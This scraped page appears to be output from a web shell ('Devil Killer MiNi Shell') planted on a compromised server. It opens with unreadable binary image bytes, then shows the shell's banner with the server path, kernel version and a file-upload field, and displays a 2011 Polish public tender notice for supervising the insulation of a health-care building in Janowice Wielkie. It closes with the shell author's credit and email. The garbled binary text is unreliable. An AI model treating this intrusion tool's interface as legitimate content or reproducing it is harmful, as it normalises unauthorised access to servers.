JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110525/128768-N-2011.html

<p class="kh_header"><b>Janowice Wielkie: Pełnienie nadzoru inwestorskiego  nad  realizacją zadania 
 pn.  Termomodernizacja budynku SP ZOZ Zespołu Profilaktyki i Rehabilitacji w Janowicach Wielkich IV etap 2011. : Ocieplenie budynku</b><br>
<b>Numer ogłoszenia: 128768 - 2011; data zamieszczenia: 25.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Profilaktyki i Rehabilitacji w Janowicach Wielkich - SP ZOZ , ul. Karola Świerczewskiego 12, 58-520 Janowice Wielkie, woj. dolnośląskie, tel. 0-75 7547500, faks 0-75 7547503.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zpir.sisco.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego  nad  realizacją zadania 
 pn.  Termomodernizacja budynku SP ZOZ Zespołu Profilaktyki i Rehabilitacji w Janowicach Wielkich IV etap 2011. : Ocieplenie budynku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Prace budowlane objęte nadzorem inwestorskim :
Wykonanie ocieplenia budynku z jednoczesnym wykonaniem nowej wyprawy elewacyjnej. Ocieplany obiekt jest budynkiem wolnostojacym, czterokondygnacyjnym, o pow. użytkowej około 
5 220 m2.Materiały użyte do ocieplenia budynku muszą odpowiadać warunkom określonym aktualną normą PN-EN 13163:2009. Zakres rzeczowy przedmiotu zamówienia obejmuje: - ocieplenie ścian metodą lekko-mokrą, płytami styropianowymi gr.15 cm z warstwą elewacyjną cienkowarstwowego tynku strukturalnego na spoiwie z wodnych dyspersji syntetycznych żywic akrylowych,barwiony w masie, struktura baranek z uziarnieniem 1,5 mm- w ilości ok. 2 634 m2, ościeży płytami styropianowymi gr. 2cm - w ilości ok. 296m2  oraz cokołu budynku - w ilości   515m2- ocieplenie połaci dachowej płytami z wełny mineralnej gr. 18 cm, założeniem membrany o wysokiej paroprzepuszczalności -1200 do 1400 g/m2/24h, paroizolacji i warstwy wykończeniowej z płyty katonowo-gipsowej gr. 12,5 mm - ogniochronnej, na ruszcie z profili stalowych CD 60 - 1.492m2,- wymiana obróbek blacharskich z zastosowaniem blachy tytanowo-cynkowej, w tym wymiana rynien fi 150~233 mb, rur spustowych fi 120 ~260mb, rur spustowych fi 150 ~95mb, rynien dachowych fi 10~115 mb, pozostałych -~211m2, - udrożnienie odpływów (ok.5m każdy) z 19 sztuk rur spustowych do studzienek, - rozbiórka istniejącego i wykonanie nowego pokrycia, z gontu bitumicznego w kolorze dachówki, 49 daszków okien mansardowych o pow. średnio 1,3* 0,8 mkażdy - łączna powierzchnia ok. 51m2, - naprawa  i uszczelnianie styków istniejącego pokrycia dachu (blachodachówka) z murami  ogniowymi - ok.50 mb, -wykonanie nowych obróbek na stykach pokrycia dachu (blachodachówką) z murem ogniowym - ok. 70 m2.- wymiana podokienników systemowych z blach gr. min.0,7 mm powlekanej w kolorze cokołu - ok 197 szt, przy czym do rozebrania istniejących jest ok. 45 m2, - wykonanie i założenie nowych drabinek śniegowych, systemowych do blachodachówki - ok. 20 mb, - wykonanie i założenie zapór śniegowych dwurzędowych, w formie naprzemiennie ustawionych haków rozbijających osuwajacy się śnieg - ok. 200 mb zapory śniegowej , - założenie 12 sztucerów podwieszanych wykonanych z blachy tytanowo cynkowej, - wykonanie na strychu 21 sztuk okien ( bawolich oczek) o wym. 113 cm*59 cm* - z zachowaniem kształtu i podziału istniejącego, pakiet szyb 4*16*4 mm, uchylne, PCV białe, dla zachowania istniejacego podziału zastosować szprosy międzyszybowe - wykonanie opaski z kostki brukowej ~5 m2 (ok. 12 mb), oraz -systemowe wykonanie reperacji 6 sztuk balkonów, 2 sztuk tarasów i 1 galerii, o łącznej powierzchni 162 m2, ocieplanego budynku z zakresem rzeczowym- przygotowanie podłoża poprzez skucie istniejącej nawierzchni z płytek - oczyszczenie powierzchni betonowej z powłok antyadhezyjnych takich jak kurz,brud, bitumy, oraz usunięcie skażeń mikrobiologicznych za pomocą stosownych preparatów używanych w oferowanym systemie reperacji, - miejscowe skucie uszkodzonego, spękanego betonu, z mechanicznym oczyszczeniem ewentualnych odsłoniętych elementów zbrojenia i zabezpieczeniu stali powłoką antykorozyjną- wykonanie systemowej warstwy szczepnej zapewniającej dobre wiązanie warastwy starego podłoża betonowego z kolejno nakładaną warstwą, - nałożenie zaprawy naprawczej wypełniającej ubytki betonu, - wyrównanie powierzchni przy użyciu szpachli na bokach i spodach balkonów czyli w miejscach nie przeznaczonych pod okładziny, - przygotowanie powierzchni pod izolację poziomą preparatem redukującym nasiąkliwość podłoża i wzmacniającym odnawianą  powierzchnię balkonów, tarasów i galerii, - wykonanie szczelnej, elastycznej powłoki folii służącej do bezspoinowego uszczelniania podłoży mineralnych przed szkodliwym oddziaływaniem wilgoci i przepływającą bezciśnieniowo wodą, przy czym pierwszą warstwę folii należy wzmocnić wtopieniem siatki z włókna szklanego, - przyklejenie płytek do podłoża systemowym klejem charakteryzującym się wysoką wytrzymałością mechaniczną i elastycznością.
Wymagania dla płytek : ceramiczne o nasiąkliwości,< 3%, odporne na ścieranie - klasa IV, antypoślizgowe oznaczone współczynnikiem R10 (wg normy DIN 51 30), mrozoodporne, - spoinowanie płytek należy wykonać systemową, elastyczna spoina. Przy reperacji balkonów, tarasów i galerii należy przestrzegać wykonania : a) spadku min. 3% ukształtowanego na zewnątrz celem umożliwienia swobodnego spływu wód opadowych, b) wykonania dylatacji brzegowych, c) podzieleniem dylatacjami płyt balkonowych, tarasowych i galerii na mniejsze pola, d) umożliwienia ruchu wokół zakotwionych elementów barierek i balustrad, - wykonanie nowych obróbek blacharskich z blachy tytanowo-cynkowej płyt poddanych reperacji, łącznie w rozwinięciu - 50m2 - oczyszczenie mechaniczne z istniejących powłok malarskich i nalotów stalowych barierek i balustrad, o łącznej powierzchni 147 m2 [98 mb (L) ] , wykonanie jednokrotne nowej powłoki emalią  antykorozyjną.
Zakres zadania budowlanego objętego nadzorem inwestorskim określa dokumentacja projektowa, w tym przedmiary robót w formie kosztorysów zerowych oraz Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych, którą Zamawiający udostępnił w wersji  elektronicznej na stronie internetowej Zespołu Profilaktyki i Rehabilitacji w Janowicach Wielkich -SP ZOZ zpir.sisco.pl (w miejscu publikacji SIWZ dot. przetargu nieograniczonego na Termomodernizację budynku SP ZOZ Zespołu Profilaktyki i Rehabilitacji IV etap 2011r : Ocieplenie budynku.Dokumentacja w wersji papierowej może zostać udostępniona zainteresowanym Wykonawcom wyłącznie do wglądu w siedzibie Zespołu ( Dział Adm.-Gospodarczy) w terminie uzgodnionym z Zamawiającym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy dokona oceny spełnienia udziału w postepowaniu na podstawie załączonych do oferty dokumentów lub oświadczeń wymaganych w SIWZ
1.  Posiada uprawnienia do wykonywania określonej działalności ,
        - zgodnie z ustawą z 07.07.1994 r. Prawo budowlane
2.  Posiada wiedzę i doświadczenie         
3. Dysponuje  osobami  zdolnymi  do wykonania zamówienia: - inspektorem nadzoru inwestorskiego w specjalności  konstrukcyjno-budowlanej</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy dokona oceny spełnienia udziału w postepowaniu na podstawie załączonych do oferty dokumentów lub oświadczeń wymaganych w SIWZ.
Posiada : minimalne  kwalifikacje: posiadanie ważnych uprawnień budowlanych do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej  - zgodnie z ustawą z 07.07.1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów  oraz  dokumentu potwierdzającego przynależność do polskiej , właściwej Izby Inżynierów Budownictwa - z datą ważności na dzień otwarcia ofert,

- minimalne doświadczenie zawodowe:  60  miesięcy  na  stanowisku  inspektora nadzoru  przy robotach  budowlanych ,  w tym:  

 -  co najmniej dwa zamówienia w zakresie nadzoru inwestorskiego, w tym przynajmniej jedno zamówienie dotyczące nadzoru inwestorskiego przy robotach budowlanych obejmujących prace termomodernizacyjne w zakresie docieplenia budynków.   
Przez wymagane minimalne doświadczenie zawodowe  należy rozumieć łączną ilość miesięcy przepracowanych  na stanowisku inspektora nadzoru w danej specjalności,  liczoną od daty uzyskania uprawnień budowlanych do daty ukazania się ogłoszenia o niniejszym zamówieniu          w Biuletynie Zamówień Publicznych .
Do doświadczenia zawodowego na stanowisku inspektora nadzoru nie sumuje się okresu zatrudnienia osoby na innych budowach w tym samym czasie .
 Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej         i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego (art. 12 pkt 7 w zw. z art. 12 a Prawa budowlanego), wymagane będzie od tej osoby uznanie jej kwalifikacji zawodowych oraz wstąpienie do właściwej polskiej izby samorządu zawodowego.  Postępowanie w sprawie uznania kwalifikacji zawodowych odbywa się na podstawie ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy dokona oceny spełnienia udziału w postepowaniu na podstawie załączonych do oferty dokumentów lub oświadczeń wymaganych w SIWZ
1Wykaz - zestawienie  informacji na temat kwalifikacji zawodowych (uprawnień) doświadczenia i wykształcenia  Załącznik Nr 4 do IDW
2.Oświadczenie o posiadaniu przez osoby wskazane do pełnienia funkcji inspektora nadzoru inwestorskiego  wymaganych uprawnień wydanych  zgodnie z przepisami ustawy   z 07.07.1994 r. Prawa budowlanego- Załącznik Nr 5 do IDW</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy dokona oceny spełnienia udziału w postepowaniu na podstawie załączonych do oferty dokumentów lub oświadczeń wymaganych w SIWZ.
W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 u.p.z.p. - wykonawca lub  wykonawcy ubiegający się  o udzielenie zamówienia wraz z ofertą złoży lub złożą oświadczenie o braku podstaw do wykluczenia ( art.24 ust.1 u.p.z.p.) - Załącznik Nr 3 do IDW.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdowania się w sytuacji ekonomicznej i finansowej umożliwiającej wykonywanie zamówienia w czasie między płatnościami Zamawiającego oraz posiadanie aktualnego , obowiązkowego ubezpieczenia z tytułu odpowiedzialności zawodowej. 
 Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zpir.sisco.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Profilaktyki i Rehabilitacji w Janowicach Wielkich - SPM ZOZ
ul.Świerczewskiego 12
58-520 Janowice Wielkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2011 godzina 11:00, miejsce: Zespół Profilaktyki i Rehabilitacji w Janowicach Wielkich -SP ZOZ
ul.Świerczewskiego 12
58-520 Janowice Wielkie Administracja - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com